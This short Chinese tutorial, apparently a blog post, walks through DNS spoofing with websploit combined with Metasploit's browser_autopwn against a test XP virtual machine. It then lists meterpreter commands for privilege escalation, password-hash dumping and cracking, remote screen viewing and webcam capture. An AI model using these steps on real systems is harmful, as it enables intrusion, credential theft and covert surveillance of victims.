原理为 websploit调用dnsdpoof进行dns欺骗配合神器metasploit的web_autopwn模块进行渗透;特点:过程基本全自动。
终端输入websploit打开websploit;输入show modules查看所有模块:
查看到有exploit/browser_autopwn模块和exploit/java_applet模块可以使用(新版metasploit去掉了exploit/autopwn模块);这里以exploit/browser_autopwn模块为例:
设置好之后输入run开始运行,然后就等着鱼儿上钩了(这两个功能完全可以单独手动配置的,这里websploit将其组合了起来):
这是虚拟机里xp测试系统打开网页之后:
getsystem #获取sytem权限
hashdump #抓取账户密码hash值 ,然后用ophcrack破解
run vnc #远程连接,监控屏幕
run webcam -p /var/www/ #监控摄像头
background #不退出此meterpreter并返回msf
。。。
视频:
清晰版视频下载地址:http://pan.baidu.com/s/1o6AYkK6
http://v.youku.com/v_show/id_XNjUxMjM2OTQ0.html